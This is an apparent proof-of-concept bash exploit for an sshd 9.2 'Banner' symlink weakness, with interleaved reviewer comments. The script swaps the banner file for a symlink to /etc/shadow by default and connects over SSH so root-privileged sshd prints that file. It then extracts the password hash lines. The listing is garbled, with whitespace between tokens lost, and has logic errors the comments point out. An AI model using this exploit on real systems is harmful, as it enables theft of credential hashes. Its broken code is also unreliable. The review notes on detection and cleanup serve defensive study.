OpenSSH sshd 9.2 symlink under banner exploit
#!/bin/bash
# By: oxagast
#
# woahisread
# This exploit depends on "Banner" being pointed at a file that exists in a
# directory writable by the user running the exploit, and on that user being
# able to remove or move the file. Basically, the banner file should be
# checked for proper permissions (owned by root and writable only by root),
# and sshd fails to do this. This allows you to create a symlink and read the
# file it points to as the user running the OpenSSH process, which is
# normally root.
# Usage helper, option parsing and defaults for the proof of concept.
# NOTE(review): whitespace between tokens was lost when this page was
# extracted (for example `echo"Usage:"`), so the listing does not parse as
# shown; the comments below describe what the visible tokens express.
# useage() only prints the usage text; it does not exit, so the caller
# continues after calling it.
useage(){echo"Usage:"echo" $0 -p 22 -s 127.0.0.1 -f /etc/shadow" 1>&2
}echo"[*] WoahIsRead sshd 9.2 banner symbolic link exploit"while getopts":s:p:f:" o;do
# Options: -p port, -s host to connect to, -f path the banner symlink will
# point at (see the ln -s step further down).
case"${o}"in
# NOTE(review): as written only the values 1 and 65535 pass this test, which
# contradicts the `-p 22` usage example; a range check was presumably
# intended. Confirm against the original script.
p)p=${OPTARG}((p == 1 || p == 65535))|| useage
;;
s)s=${OPTARG};;
f)f=${OPTARG};;
?)
useage
;;esacdone
# Defaults when an option was not given: /etc/shadow, port 22, localhost.
shift$((OPTIND -1))if[[!$f]];then
f="/etc/shadow"fi
if[[!$p]];then
p="22"fi
if[[!$s]];then
s="127.0.0.1"fi
# Looks up the configured banner path and replaces that path with a symlink
# to $f.
# BPATH is taken from a line starting with "Banner " in /etc/ssh/sshd_config
# only. When auditing a host, prefer the effective value reported by
# `sshd -T`, since this grep does not follow included files.
# NOTE(review): OWN is the owner of $f (the file to be read), not of $BPATH,
# although the message below labels it "Banner owner".
BPATH=$(grep-i"^Banner " /etc/ssh/sshd_config | cut-d' '-f 2)VER=$(sshd -V 2>&1 | cut-d','-f 1)OWN=$(stat-c"%U"$f)echo"[*] SSHD Version: $VER"echo"[*] SSHD Banner path is: $BPATH"echo"[*] SSHD Banner owner is: $OWN"if[[$BPATH=="none"]];then
echo"[x] SSHD Banner must be set to a user owned file"exit 1
fi
# Both the rename and the symlink creation need write permission on the
# directory that holds the banner file; that is the precondition named in the
# header comment. If the banner file and every directory on its path are
# owned by root and not writable by other users, these steps fail.
# Indicators on a host: the Banner path resolving to a symlink, or a
# "<banner>.bak" file sitting next to it.
if test-e$BPATH;then
mv$BPATH$BPATH.bak
# MOV=1 records that a backup of the original banner exists.
ln-s$f$BPATHMOV=1
else
ln-s$f$BPATHfi
# Connects to the SSH server and captures what the client prints, then shows
# the captured text.
echo"[*] SSHing to ourselves... $s:$p"
# BatchMode=true disables interactive prompts; stdout and stderr of the client
# are written to /tmp/sshexp.1. Presumably this relies on the server sending
# the banner before authentication; confirm.
# NOTE(review): /tmp/sshexp.1 is a fixed, predictable name and `out` is
# created in the current directory. Nothing visible in this listing removes
# either file, so both keep a copy of whatever the banner path exposed; they
# are artifacts to look for and delete after a test run.
ssh -oBatchMode=true$s-p$p 2>&1 | tee /tmp/sshexp.1 >/dev/null
# Drops the last captured line (presumably the client's own error message).
head-n-1 /tmp/sshexp.1 >out
if[[$f=="/etc/shadow"]];then
# Success test for the default target: the first captured line mentions root.
if[[$(head-n 1 out | grep root)]];then
# Prints only the lines that contain a ":$<char>$" hash prefix.
grep':\$.\$' out
# Restores the original banner only if it was moved aside earlier (MOV=1).
echo"[!] Exploit complete, cleaning up..."if[[$MOV-eq 1 ]];then
mv$BPATH.bak $BPATHfi
exit 0
else
# NOTE(review): this failure branch and the non-shadow branch below exit
# without restoring the banner, so the symlink and any .bak file stay in
# place. After a test run, verify that the Banner path is again a regular,
# root-owned file.
echo"[x] Sorry, exploit failed."exit 1
fi
else
cat out
exit 0
fi